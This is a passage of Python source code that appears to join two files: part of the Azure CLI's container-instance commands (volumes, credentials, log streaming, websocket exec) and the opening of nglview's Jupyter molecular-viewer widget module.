image_registry_credentials = [ImageRegistryCredential(server=registry_login_server,
username=registry_username,
password=registry_password)]
elif ACR_SERVER_DELIMITER in image.split("/")[0]:
if not registry_username:
try:
registry_username = prompt(msg='Image registry username: ')
except NoTTYException:
raise CLIError('Please specify --registry-username in order to use Azure Container Registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use Azure Container Registry.')
acr_server = image.split("/")[0] if image.split("/") else None
if acr_server:
image_registry_credentials = [ImageRegistryCredential(server=acr_server,
username=registry_username,
password=registry_password)]
elif registry_username and registry_password and SERVER_DELIMITER in image.split("/")[0]:
login_server = image.split("/")[0] if image.split("/") else None
if login_server:
image_registry_credentials = [ImageRegistryCredential(server=login_server,
username=registry_username,
password=registry_password)]
else:
raise CLIError('Failed to parse login server from image name; please explicitly specify --registry-server.')
return image_registry_credentials
def _create_azure_file_volume(azure_file_volume_share_name, azure_file_volume_account_name, azure_file_volume_account_key):
"""Create Azure File volume. """
azure_file_volume = None
if azure_file_volume_share_name:
if not azure_file_volume_account_name:
raise CLIError('Please specify --azure-file-volume-account-name in order to use Azure File volume.')
if not azure_file_volume_account_key:
try:
azure_file_volume_account_key = prompt_pass(msg='Azure File storage account key: ')
except NoTTYException:
raise CLIError('Please specify --azure-file-volume-account-key in order to use Azure File volume.')
azure_file_volume = AzureFileVolume(share_name=azure_file_volume_share_name,
storage_account_name=azure_file_volume_account_name,
storage_account_key=azure_file_volume_account_key)
return Volume(name=AZURE_FILE_VOLUME_NAME, azure_file=azure_file_volume) if azure_file_volume else None
def _create_secrets_volume(secrets):
"""Create secrets volume. """
return Volume(name=SECRETS_VOLUME_NAME, secret=secrets) if secrets else None
def _create_gitrepo_volume(gitrepo_url, gitrepo_dir, gitrepo_revision):
"""Create Git Repo volume. """
gitrepo_volume = GitRepoVolume(repository=gitrepo_url, directory=gitrepo_dir, revision=gitrepo_revision)
return Volume(name=GITREPO_VOLUME_NAME, git_repo=gitrepo_volume) if gitrepo_url else None
# pylint: disable=inconsistent-return-statements
def _create_azure_file_volume_mount(azure_file_volume, azure_file_volume_mount_path):
"""Create Azure File volume mount. """
if azure_file_volume_mount_path:
if not azure_file_volume:
raise CLIError('Please specify --azure-file-volume-share-name --azure-file-volume-account-name --azure-file-volume-account-key '
'to enable Azure File volume mount.')
return VolumeMount(name=AZURE_FILE_VOLUME_NAME, mount_path=azure_file_volume_mount_path)
def _create_secrets_volume_mount(secrets_volume, secrets_mount_path):
"""Create secrets volume mount. """
if secrets_volume:
if not secrets_mount_path:
raise CLIError('Please specify --secrets --secrets-mount-path '
'to enable secrets volume mount.')
return VolumeMount(name=SECRETS_VOLUME_NAME, mount_path=secrets_mount_path)
def _create_gitrepo_volume_mount(gitrepo_volume, gitrepo_mount_path):
"""Create Git Repo volume mount. """
if gitrepo_mount_path:
if not gitrepo_volume:
raise CLIError('Please specify --gitrepo-url (--gitrepo-dir --gitrepo-revision) '
'to enable Git Repo volume mount.')
return VolumeMount(name=GITREPO_VOLUME_NAME, mount_path=gitrepo_mount_path)
# pylint: disable=inconsistent-return-statements
def _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile):
"""Create IP address. """
if (ip_address and ip_address.lower() == 'public') or dns_name_label:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
dns_name_label=dns_name_label, type=ContainerGroupIpAddressType.public)
elif network_profile:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
type=ContainerGroupIpAddressType.private)
# pylint: disable=inconsistent-return-statements
def container_logs(cmd, resource_group_name, name, container_name=None, follow=False):
"""Tail a container instance log. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
if not follow:
log = container_client.list_logs(resource_group_name, name, container_name)
print(log.content)
else:
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
shupdown_grace_period=5,
stream_target=_stream_logs,
stream_args=(container_client, resource_group_name, name, container_name, container_group.restart_policy))
def container_export(cmd, resource_group_name, name, file):
resource_client = cf_resource(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
resource = resource_client.resources.get(resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
container_group_client.api_version,
False).__dict__
# Remove unwanted properites
resource['properties'].pop('instanceView', None)
resource.pop('sku', None)
resource.pop('id', None)
resource.pop('plan', None)
resource.pop('identity', None)
resource.pop('kind', None)
resource.pop('managed_by', None)
resource['properties'].pop('provisioningState', None)
for i in range(len(resource['properties']['containers'])):
resource['properties']['containers'][i]['properties'].pop('instanceView', None)
# Add the api version
resource['apiVersion'] = container_group_client.api_version
with open(file, 'w+') as f:
yaml.dump(resource, f, default_flow_style=False)
def container_exec(cmd, resource_group_name, name, exec_command, container_name=None, terminal_row_size=20, terminal_col_size=80):
"""Start exec for a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
if container_name or container_name is None and len(container_group.containers) == 1:
# If only one container in container group, use that container.
if container_name is None:
container_name = container_group.containers[0].name
terminal_size = ContainerExecRequestTerminalSize(rows=terminal_row_size, cols=terminal_col_size)
execContainerResponse = container_client.execute_command(resource_group_name, name, container_name, exec_command, terminal_size)
if platform.system() is WINDOWS_NAME:
_start_exec_pipe_win(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
_start_exec_pipe(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
raise CLIError('--container-name required when container group has more than one container.')
def _start_exec_pipe_win(web_socket_uri, password):
def _on_ws_open(ws):
ws.send(password)
t = threading.Thread(target=_capture_stdin, args=[ws])
t.daemon = True
t.start()
ws = websocket.WebSocketApp(web_socket_uri, on_open=_on_ws_open, on_message=_on_ws_msg)
ws.run_forever()
def _on_ws_msg(ws, msg):
sys.stdout.write(msg)
sys.stdout.flush()
def _capture_stdin(ws):
while True:
if msvcrt.kbhit:
x = msvcrt.getch()
ws.send(x)
def _start_exec_pipe(web_socket_uri, password):
ws = websocket.create_connection(web_socket_uri)
oldtty = termios.tcgetattr(sys.stdin)
old_handler = signal.getsignal(signal.SIGWINCH)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
ws.send(password)
while True:
try:
if not _cycle_exec_pipe(ws):
break
except (select.error, IOError) as e:
if e.args and e.args[0] == errno.EINTR:
pass
else:
raise
except websocket.WebSocketException:
pass
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
signal.signal(signal.SIGWINCH, old_handler)
def _cycle_exec_pipe(ws):
r, _, _ = select.select([ws.sock, sys.stdin], [], [])
if ws.sock in r:
data = ws.recv()
if not data:
return False
sys.stdout.write(data)
sys.stdout.flush()
if sys.stdin in r:
x = sys.stdin.read(1)
if not x:
return True
ws.send(x)
return True
def attach_to_container(cmd, resource_group_name, name, container_name=None):
"""Attach to a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
shupdown_grace_period=5,
stream_target=_stream_container_events_and_logs,
stream_args=(container_group_client, container_client, resource_group_name, name, container_name))
def _start_streaming(terminate_condition, terminate_condition_args, shupdown_grace_period, stream_target, stream_args):
"""Start streaming for the stream target. """
import colorama
colorama.init()
try:
t = threading.Thread(target=stream_target, args=stream_args)
t.daemon = True
t.start()
while not terminate_condition(*terminate_condition_args) and t.is_alive():
time.sleep(10)
time.sleep(shupdown_grace_period)
finally:
colorama.deinit()
def _stream_logs(client, resource_group_name, name, container_name, restart_policy):
"""Stream logs for a container. """
lastOutputLines = 0
while True:
log = client.list_logs(resource_group_name, name, container_name)
lines = log.content.split('\n')
currentOutputLines = len(lines)
# Should only happen when the container restarts.
if currentOutputLines < lastOutputLines and restart_policy != 'Never':
print("Warning: you're having '--restart-policy={}'; the container '{}' was just restarted; the tail of the current log might be missing. Exiting...".format(restart_policy, container_name))
break
_move_console_cursor_up(lastOutputLines)
print(log.content)
lastOutputLines = currentOutputLines
time.sleep(2)
def _stream_container_events_and_logs(container_group_client, container_client, resource_group_name, name, container_name):
"""Stream container events and logs. """
lastOutputLines = 0
lastContainerState = None
while True:
container_group, container = _find_container(container_group_client, resource_group_name, name, container_name)
container_state = 'Unknown'
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state:
container_state = container.instance_view.current_state.state
_move_console_cursor_up(lastOutputLines)
if container_state != lastContainerState:
print("Container '{}' is in state '{}'...".format(container_name, container_state))
currentOutputLines = 0
if container.instance_view and container.instance_view.events:
for event in sorted(container.instance_view.events, key=lambda e: e.last_timestamp):
print('(count: {}) (last timestamp: {}) {}'.format(event.count, event.last_timestamp, event.message))
currentOutputLines += 1
lastOutputLines = currentOutputLines
lastContainerState = container_state
if container_state == 'Running':
print('\nStart streaming logs:')
break
time.sleep(2)
_stream_logs(container_client, resource_group_name, name, container_name, container_group.restart_policy)
def _is_container_terminated(client, resource_group_name, name, container_name):
"""Check if a container should be considered terminated. """
container_group, container = _find_container(client, resource_group_name, name, container_name)
# If a container group is terminated, assume the container is also terminated.
if container_group.instance_view and container_group.instance_view.state:
if container_group.instance_view.state == 'Succeeded' or container_group.instance_view.state == 'Failed':
return True
# If the restart policy is Always, assume the container will be restarted.
if container_group.restart_policy:
if container_group.restart_policy == 'Always':
return False
# Only assume the container is terminated if its state is Terminated.
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state == 'Terminated':
return True
return False
def _find_container(client, resource_group_name, name, container_name):
"""Find a container in a container group. """
container_group = client.get(resource_group_name, name)
containers = [c for c in container_group.containers if c.name == container_name]
if len(containers) != 1:
raise CLIError("Found 0 or more than 1 container with name '{}'".format(container_name))
return container_group, containers[0]
def _move_console_cursor_up(lines):
"""Move console cursor up. """
if lines > 0:
# Use stdout.write to support Python 2
sys.stdout.write('\033[{}A\033[K\033[J'.format(lines))
|
widget.py
|
import base64
import json
import logging
import threading
import time
import uuid
import ipywidgets as widgets
import ipywidgets.embed
import numpy as np
from IPython.display import display
from ipywidgets import (Image, Box, DOMWidget, HBox, VBox, IntSlider, Output, Play, Widget,
jslink)
from ipywidgets import widget as _widget
from traitlets import (Bool, CaselessStrEnum, Dict, Instance, Int, Integer,
List, Unicode, observe, validate)
import traitlets
from . import color, interpolate
from .adaptor import Structure, Trajectory
from .component import ComponentViewer
from .config import BACKENDS
from .player import TrajectoryPlayer, _dry_run
from .remote_thread import RemoteCallThread
from .representation import RepresentationControl
from .shape import Shape
from .stage import Stage
from .utils import py_utils, widget_utils
from .utils.py_utils import (FileManager, _camelize_dict, _update_url,
encode_base64, get_repr_names_from_dict,
seq_to_string)
from .viewer_control import ViewerControl
from ._frontend import __frontend_version__
from .base import BaseWidget
widget_serialization = _widget.widget_serialization
__all__ = ['NGLWidget', 'ComponentViewer']
_EXCLUDED_CALLBACK_AFTER_FIRING = {
'setUnSyncCamera',
'setSelector',
'setDelay',
'autoView',
'_downloadImage',
'_exportImage',
'set_representation_from_backend',
}
def _deprecated(msg):
def wrap_1(func):
def wrap_2(*args, **kwargs):
logging.warn(msg)
return func(*args, **kwargs)
return wrap_2
return wrap_1
def write_html(fp, views, frame_range=None):
# type: (str, List[NGLWidget]) -> None
"""EXPERIMENTAL. Likely will be changed.
Make html file to display a list of views. For further options, please
check `ipywidgets.embed` module.
Parameters
----------
fp : str or file handle
views : a DOMWidget view or a list of views.
frame_range : None or a tuple of int
Examples
--------
>>> import nglview
>>> view = nglview.show_pdbid('1tsu')
>>> view # doctest: +SKIP
>>> nglview.write_html('index.html', [view]) # doctest: +SKIP
>>> nglview.write_html('index.html', [view], frame_range=(0, 5)) # doctest: +SKIP
"""
views = isinstance(views, DOMWidget) and [views] or views
embed = ipywidgets.embed
color = None
theme = None
for k, v in views[0].widgets.items():
if v.__class__.__name__ == '_ColormakerRegistry':
color = v
if v.__class__.__name__ == 'ThemeManager':
theme = v
for v in [color, theme]:
v and views.insert(0, v)
def _set_serialization(views):
for view in views:
if hasattr(view, '_set_serialization'):
view._set_serialization(frame_range=frame_range)
elif isinstance(view, Box):
_set_serialization(view.children)
def _unset_serialization(views):
for view in views:
if hasattr(view, '_unset_serialization'):
view._unset_serialization()
elif isinstance(view, Box):
_unset_serialization(view.children)
_set_serialization(views)
# FIXME: allow add jquery-ui link?
snippet = '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.0/jquery-ui.css">\n'
snippet += embed.embed_snippet(views)
html_code = embed.html_template.format(title='nglview-demo',
snippet=snippet)
# from ipywidgets
# Check if fp is writable:
if hasattr(fp, 'write'):
fp.write(html_code)
else:
# Assume fp is a filename:
with open(fp, "w") as f:
f.write(html_code)
_unset_serialization(views)
class NGLWidget(DOMWidget):
_view_name = Unicode("NGLView").tag(sync=True)
_view_module = Unicode("nglview-js-widgets").tag(sync=True)
_view_module_version = Unicode(__frontend_version__).tag(sync=True)
_model_name = Unicode("NGLModel").tag(sync=True)
_model_module = Unicode("nglview-js-widgets").tag(sync=True)
_model_module_version = Unicode(__frontend_version__).tag(sync=True)
_ngl_version = Unicode().tag(sync=True)
# _model_name = Unicode("NGLView").tag(sync=True)
# _model_module = Unicode("nglview-js-widgets").tag(sync=True)
_image_data = Unicode().tag(sync=False)
# use Integer here, because mdtraj uses a long datatype here on Python-2.7
frame = Integer().tag(sync=True)
max_frame = Int(0).tag(sync=True)
background = Unicode('white').tag(sync=True)
loaded = Bool(False).tag(sync=False)
picked = Dict().tag(sync=True)
n_components = Int(0).tag(sync=True)
_view_width = Unicode().tag(sync=True) # px
_view_height = Unicode().tag(sync=True) # px
_scene_position = Dict().tag(sync=True)
_scene_rotation = Dict().tag(sync=True)
# hack to always display movie
# TODO: remove _parameters?
_parameters = Dict().tag(sync=False)
_ngl_full_stage_parameters = Dict().tag(sync=True)
_ngl_original_stage_parameters = Dict().tag(sync=True)
_coordinates_dict = Dict().tag(sync=False)
_camera_str = CaselessStrEnum(['perspective', 'orthographic'],
default_value='orthographic').tag(sync=True)
_camera_orientation = List().tag(sync=True)
_synced_model_ids = List().tag(sync=True)
_synced_repr_model_ids = List().tag(sync=True)
_ngl_view_id = List().tag(sync=True)
_ngl_repr_dict = Dict().tag(sync=True)
_ngl_component_ids = List().tag(sync=False)
_ngl_component_names = List().tag(sync=False)
_ngl_msg = None
_send_binary = Bool(True).tag(sync=False)
_init_gui = Bool(False).tag(sync=False)
gui_style = CaselessStrEnum(['ngl'], allow_none=True).tag(sync=True)
_gui_theme = CaselessStrEnum(['dark', 'light'], allow_none=True).tag(sync=True)
_widget_theme = None
_ngl_serialize = Bool(False).tag(sync=True)
_ngl_msg_archive = List().tag(sync=True)
_ngl_coordinate_resource = Dict().tag(sync=True)
_representations = List().tag(sync=False)
_ngl_color_dict = Dict().tag(sync=True)
_player_dict = Dict().tag(sync=True)
# instance
_iplayer = Instance(widgets.Box,
allow_none=True).tag(sync=True, **widget_serialization)
_igui = Instance(widgets.Tab,
allow_none=True).tag(sync=True, **widget_serialization)
_ibtn_fullscreen = Instance(widgets.Button,
allow_none=True).tag(sync=True, **widget_serialization)
def __init__(self,
structure=None,
representations=None,
parameters=None,
**kwargs):
super().__init__(**kwargs)
self._gui = None
self._init_gui = kwargs.pop('gui', False)
self._theme = kwargs.pop('theme', 'default')
self._widget_image = Image()
self._widget_image.width = 900.
self._image_array = []
# do not use _displayed_callbacks since there is another Widget._display_callbacks
self._event = threading.Event()
self._ngl_displayed_callbacks_before_loaded = []
widget_utils._add_repr_method_shortcut(self, self)
self.shape = Shape(view=self)
self.stage = Stage(view=self)
self.control = ViewerControl(view=self)
self._handle_msg_thread = threading.Thread(
target=self.on_msg, args=(self._ngl_handle_msg, ))
# # register to get data from JS side
self._handle_msg_thread.daemon = True
self._handle_msg_thread.start()
self._remote_call_thread = RemoteCallThread(
self,
registered_funcs=['loadFile', 'replaceStructure', '_exportImage'])
self._remote_call_thread.start()
self._trajlist = []
self._ngl_component_ids = []
if representations:
# Must be set here before calling
# add_trajectory or add_struture
# After finish adding new Structure/Trajectory,
# initial representations will be set.
kwargs['default_representation'] = False
else:
if 'default' in kwargs:
kwargs['default_representation'] = kwargs['default']
autoview = 'center' not in kwargs or ('center' in kwargs
and kwargs.pop('center'))
# NOTE: Using `pop` to avoid passing `center` to NGL.
if parameters:
self.parameters = parameters
if isinstance(structure, Trajectory):
name = py_utils.get_name(structure, kwargs)
self.add_trajectory(structure, name=name, **kwargs)
elif isinstance(structure, (list, tuple)):
trajectories = structure
for trajectory in trajectories:
name = py_utils.get_name(trajectory, kwargs)
self.add_trajectory(trajectory, name=name, **kwargs)
else:
if structure is not None:
self.add_structure(structure, **kwargs)
if representations:
# If initial representations are provided,
# we need to set defaultRepresentation to False
self.representations = representations
if autoview:
self.center()
self.player = TrajectoryPlayer(self)
self._view_width = kwargs.get('width', '')
self._view_height = kwargs.get('height', '')
# Updating only self.layout.{width, height} don't handle
# resizing NGL widget properly.
self._sync_with_layout()
self._create_player()
self._create_ibtn_fullscreen()
def _create_ibtn_fullscreen(self):
button = widgets.Button(icon='compress')
button.layout.width = '34px'
# onclick is implemented in frontend
self._ibtn_fullscreen = button
def _sync_with_layout(self):
def on_change_layout(change):
new = change['new']
if change['name'] == 'width':
self._set_size(new, '')
elif change['name'] == 'height':
self._set_size('', new)
self.layout.observe(on_change_layout, ['width', 'height'])
def _set_serialization(self, frame_range=None):
self._ngl_serialize = True
resource = self._ngl_coordinate_resource
if frame_range is not None:
for t_index, traj in enumerate(self._trajlist):
resource[t_index] = []
for f_index in range(*frame_range):
if f_index < traj.n_frames:
resource[t_index].append(
encode_base64(traj.get_coordinates(f_index)))
else:
resource[t_index].append(
encode_base64(np.empty((0), dtype='f4')))
resource['n_frames'] = len(resource[0])
self._ngl_coordinate_resource = resource
self._ngl_color_dict = color._USER_COLOR_DICT.copy()
def _create_player(self):
player = Play(max=self.max_frame, interval=100)
slider = IntSlider(max=self.max_frame)
self._iplayer = HBox([player, slider])
self.player.widget_player = player
self.player.widget_player_slider = slider
jslink((player, 'value'), (slider, 'value'))
jslink((player, 'value'), (self, 'frame'))
jslink((player, 'max'), (self, 'max_frame'))
jslink((slider, 'max'), (self, 'max_frame'))
def _unset_serialization(self):
self._ngl_serialize = False
self._ngl_coordinate_resource = {}
@property
def parameters(self):
return self._parameters
@parameters.setter
def parameters(self, params):
params = _camelize_dict(params)
self._parameters = params
self._remote_call('setParameters', target='Widget', args=[
params,
])
@property
def camera(self):
return self._camera_str
@camera.setter
def camera(self, value):
"""
Parameters
----------
value : str, {'perspective', 'orthographic'}
"""
self._camera_str = value
# use _remote_call so this function can be called right after
# self is displayed
self._remote_call("setParameters",
target='Stage',
kwargs=dict(cameraType=self._camera_str))
def _set_camera_orientation(self, arr):
self._remote_call('set_camera_orientation',
target='Widget',
args=[
arr,
])
def _request_stage_parameters(self):
self._remote_call('requestUpdateStageParameters', target='Widget')
@validate('gui_style')
def _validate_gui_style(self, proposal):
val = proposal['value']
if val == 'ngl':
if self._widget_theme is None:
from .theme import ThemeManager
self._widget_theme = ThemeManager()
if self._widget_theme._theme is None:
self._widget_theme.light()
return val
@observe("_gui_theme")
def _on_theme_changed(self, change):
# EXPERIMENTAL
from nglview.theme import theme
if change.new == 'dark':
self._widget_theme.dark()
elif change.new == 'light':
self._widget_theme.light()
@observe('picked')
def _on_picked(self, change):
picked = change['new']
if self.player.widget_picked is not None:
self.player.widget_picked.value = json.dumps(picked)
@observe('background')
def _update_background_color(self, change):
color = change['new']
self.stage.set_parameters(background_color=color)
def handle_resize(self):
# self._remote_call("handleResize", target='Stage')
self._remote_call("handleResize")
@observe('n_components')
def _handle_n_components_changed(self, change):
if self.player.widget_repr is not None:
component_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'component_slider')
if change['new'] - 1 >= component_slider.min:
component_slider.max = change['new'] - 1
component_dropdown = widget_utils.get_widget_by_name(
self.player.widget_repr, 'component_dropdown')
component_dropdown.options = tuple(self._ngl_component_names)
if change['new'] == 0:
component_dropdown.options = tuple([' '])
component_dropdown.value = ' '
component_slider.max = 0
reprlist_choices = widget_utils.get_widget_by_name(
self.player.widget_repr, 'reprlist_choices')
reprlist_choices.options = tuple([' '])
repr_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_slider')
repr_slider.max = 0
repr_name_text = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_name_text')
repr_selection = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_selection')
repr_name_text.value = ' '
repr_selection.value = ' '
@observe('_ngl_repr_dict')
def _handle_repr_dict_changed(self, change):
if self.player.widget_repr is not None:
repr_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_slider')
component_slider = widget_utils.get_widget_by_name(
self.player.widget_repr, 'component_slider')
repr_name_text = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_name_text')
repr_selection = widget_utils.get_widget_by_name(
self.player.widget_repr, 'repr_selection')
reprlist_choices = widget_utils.get_widget_by_name(
self.player.widget_repr, 'reprlist_choices')
repr_names = get_repr_names_from_dict(self._ngl_repr_dict,
component_slider.value)
if change['new'] == {0: {}}:
repr_selection.value = ''
else:
options = tuple(
str(i) + '-' + name for (i, name) in enumerate(repr_names))
reprlist_choices.options = options
try:
value = reprlist_choices.options[repr_slider.value]
if isinstance(value, tuple):
# https://github.com/jupyter-widgets/ipywidgets/issues/1512
value = value[0]
reprlist_choices.value = value
except IndexError:
if repr_slider.value == 0:
# works fine with ipywidgets 5.2.2
reprlist_choices.options = tuple([
' ',
])
reprlist_choices.value = ' '
else:
reprlist_choices.value = reprlist_choices.options[
repr_slider.value - 1]
# e.g: 0-cartoon
repr_name_text.value = reprlist_choices.value.split(
'-')[-1].strip()
repr_slider.max = len(repr_names) - 1 if len(
repr_names) >= 1 else len(repr_names)
def _update_max_frame(self):
self.max_frame = max(
int(traj.n_frames) for traj in self._trajlist
if hasattr(traj, 'n_frames')) - 1 # index starts from 0
def _wait_until_finished(self, timeout=0.0001):
# NGL need to send 'finished' signal to
# backend
self._event.clear()
while True:
# idle to make room for waiting for
# "finished" event sent from JS
time.sleep(timeout)
if self._event.is_set():
# if event is set from another thread
# break while True
break
def _run_on_another_thread(self, func, *args):
# use `event` to singal
# func(*args)
thread = threading.Thread(
target=func,
args=args,
)
thread.daemon = True
thread.start()
return thread
@observe('loaded')
def on_loaded(self, change):
# trick for firefox on Linux
time.sleep(0.1)
if change['new']:
self._fire_callbacks(self._ngl_displayed_callbacks_before_loaded)
def _fire_callbacks(self, callbacks):
def _call(event):
for callback in callbacks:
callback(self)
if callback._method_name == 'loadFile':
self._wait_until_finished()
self._run_on_another_thread(_call, self._event)
def _ipython_display_(self, **kwargs):
super()._ipython_display_(**kwargs)
if self._init_gui:
if self._gui is None:
self._gui = self.player._display()
display(self._gui)
def display(self, gui=False, style='ngl'):
"""
Parameters
----------
gui : bool
If True: turn on GUI
style : str, {'ngl', 'ipywidgets}, default 'ngl'
GUI style (with gui=True)
"""
if gui:
if style == 'ipywidgets':
# For the old implementation
# is there anyone using this?
self.gui_style = None # turn off the NGL's GUI
self._gui = self.player._display()
self._gui.layout.align_self = 'stretch'
self._gui.layout.width = '400px'
b = HBox([self, self._gui])
def on(b):
self.handle_resize()
b.on_displayed(on)
return b
elif style == 'ngl':
self.gui_style = 'ngl'
return self
else:
return self
def _set_size(self, w, h):
'''
Parameters
----------
w, h : float or str
Examples
--------
>>> import nglview; view = nglview.demo()
>>> view._set_size(100, 100)
>>> view._set_size('100px', '100px')
>>> view._set_size('50%', '50%')
'''
self._remote_call('setSize', target='Widget', args=[w, h])
def _set_sync_repr(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_repr_model_ids = sorted(
set(self._synced_repr_model_ids) | model_ids)
self._remote_call("setSyncRepr",
target="Widget",
args=[self._synced_repr_model_ids])
def _set_unsync_repr(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_repr_model_ids = list(set(self._synced_repr_model_ids) - model_ids)
self._remote_call("setSyncRepr",
target="Widget",
args=[self._synced_repr_model_ids])
def _set_sync_camera(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_model_ids = sorted(
set(self._synced_model_ids) | model_ids)
self._remote_call("setSyncCamera",
target="Widget",
args=[self._synced_model_ids])
def _set_unsync_camera(self, other_views):
model_ids = {v._model_id for v in other_views}
self._synced_model_ids = list(set(self._synced_model_ids) - model_ids)
self._remote_call("setSyncCamera",
target="Widget",
args=[self._synced_model_ids])
def _set_spin(self, axis, angle):
self._remote_call('setSpin', target='Stage', args=[axis, angle])
def _set_selection(self, selection, component=0, repr_index=0):
self._remote_call("setSelection",
target='Representation',
args=[selection],
kwargs=dict(component_index=component,
repr_index=repr_index))
def color_by(self, color_scheme, component=0):
'''update color for all representations of given component
Notes
-----
Unstable feature
Parameters
----------
color_scheme : str
component : int, default 0
component index
Examples
--------
>>> import nglview
>>> view = nglview.demo()
>>> # component 0
>>> view.color_by('atomindex')
>>> # component 1
>>> view.color_by('atomindex', component=1)
'''
repr_names = get_repr_names_from_dict(self._ngl_repr_dict, component)
for index, _ in enumerate(repr_names):
self.update_representation(component=component,
repr_index=index,
color_scheme=color_scheme)
@property
def representations(self):
return self._representations
@representations.setter
def representations(self, reps):
if isinstance(reps, dict):
self._remote_call("_set_representation_from_repr_dict",
args=[reps])
else:
self._representations = reps[:]
for index in range(len(self._ngl_component_ids)):
self.set_representations(reps)
def update_representation(self, component=0, repr_index=0, **parameters):
"""
Parameters
----------
component : int, default 0
component index
repr_index : int, default 0
representation index for given component
parameters : dict
"""
parameters = _camelize_dict(parameters)
kwargs = dict(component_index=component, repr_index=repr_index)
kwargs.update(parameters)
self._remote_call('setParameters',
target='Representation',
kwargs=kwargs)
self._update_repr_dict()
def _update_repr_dict(self):
""" Send a request to fronend to send representation parameters
back.
# TODO: sync or async
"""
self._remote_call('request_repr_dict', target='Widget')
def set_representations(self, representations, component=0):
"""
Parameters
----------
representations : list of dict
"""
self.clear_representations(component=component)
for params in representations:
assert isinstance(params, dict), 'params must be a dict'
kwargs = params['params']
kwargs.update({'component_index': component})
self._remote_call('addRepresentation',
target='compList',
args=[
params['type'],
],
kwargs=kwargs)
def _remove_representation(self, component=0, repr_index=0):
self._remote_call('removeRepresentation',
target='Widget',
args=[component, repr_index])
def _remove_representations_by_name(self, repr_name, component=0):
self._remote_call('removeRepresentationsByName',
target='Widget',
args=[repr_name, component])
def _update_representations_by_name(self, repr_name, component=0,
**kwargs):
kwargs = _camelize_dict(kwargs)
self._remote_call('updateRepresentationsByName',
target='Widget',
args=[repr_name, component],
kwargs=kwargs)
def _display_repr(self, component=0, repr_index=0, name=None):
c = 'c' + str(component)
r = str(repr_index)
try:
name = self._ngl_repr_dict[c][r]['type']
except KeyError:
name = ''
return RepresentationControl(self, component, repr_index, name=name)
def _set_coordinates(self, index, movie_making=False, render_params=None):
# FIXME: use movie_making here seems awkward.
'''update coordinates for all trajectories at index-th frame
'''
render_params = render_params or {}
if self._trajlist:
coordinates_dict = {}
for trajectory in self._trajlist:
traj_index = self._ngl_component_ids.index(trajectory.id)
try:
if trajectory.shown:
if self.player.interpolate:
t = self.player.iparams.get('t', 0.5)
step = self.player.iparams.get('step', 1)
coordinates_dict[traj_index] = interpolate.linear(
index, t=t, traj=trajectory, step=step)
else:
coordinates_dict[
traj_index] = trajectory.get_coordinates(index)
else:
coordinates_dict[traj_index] = np.empty((0),
dtype='f4')
except (IndexError, ValueError):
coordinates_dict[traj_index] = np.empty((0), dtype='f4')
self.set_coordinates(coordinates_dict,
render_params=render_params,
movie_making=movie_making)
else:
print("no trajectory available")
def set_coordinates(self, arr_dict, movie_making=False,
render_params=None):
# type: (Dict[int, np.ndarray]) -> None
"""Used for update coordinates of a given trajectory
>>> # arr: numpy array, ndim=2
>>> # update coordinates of 1st trajectory
>>> view.set_coordinates({0: arr})# doctest: +SKIP
"""
render_params = render_params or {}
self._coordinates_dict = arr_dict
buffers = []
coordinates_meta = dict()
for index, arr in self._coordinates_dict.items():
buffers.append(arr.astype('f4').tobytes())
coordinates_meta[index] = index
msg = {
'type': 'binary_single',
'data': coordinates_meta,
}
if movie_making:
msg['movie_making'] = movie_making
msg['render_params'] = render_params
self.send(
msg,
buffers=buffers)
@observe('frame')
def _on_frame_changed(self, change):
"""set and send coordinates at current frame
"""
self._set_coordinates(self.frame)
def clear(self, *args, **kwargs):
'''shortcut of `clear_representations`
'''
self.clear_representations(*args, **kwargs)
def clear_representations(self, component=0):
'''clear all representations for given component
Parameters
----------
component : int, default 0 (first model)
You need to keep track how many components you added.
'''
self._remote_call("removeAllRepresentations",
target='compList',
kwargs={'component_index': component})
@_update_url
def _add_shape(self, shapes, name='shape'):
"""add shape objects
TODO: update doc, caseless shape keyword
Parameters
----------
shapes : list of tuple
name : str, default 'shape'
name of given shape
Notes
-----
Supported shape: 'mesh', 'sphere', 'ellipsoid', 'cylinder', 'cone', 'arrow'.
See also
--------
{ngl_url}
Examples
--------
>>> import nglview
>>> view = nglview.demo()
>>> sphere = ('sphere', [0, 0, 9], [1, 0, 0], 1.5)
>>> arrow = ('arrow', [1, 2, 7 ], [30, 3, 3], [1, 0, 1], 1.0)
>>> view._add_shape([sphere, arrow], name='my_shape')
"""
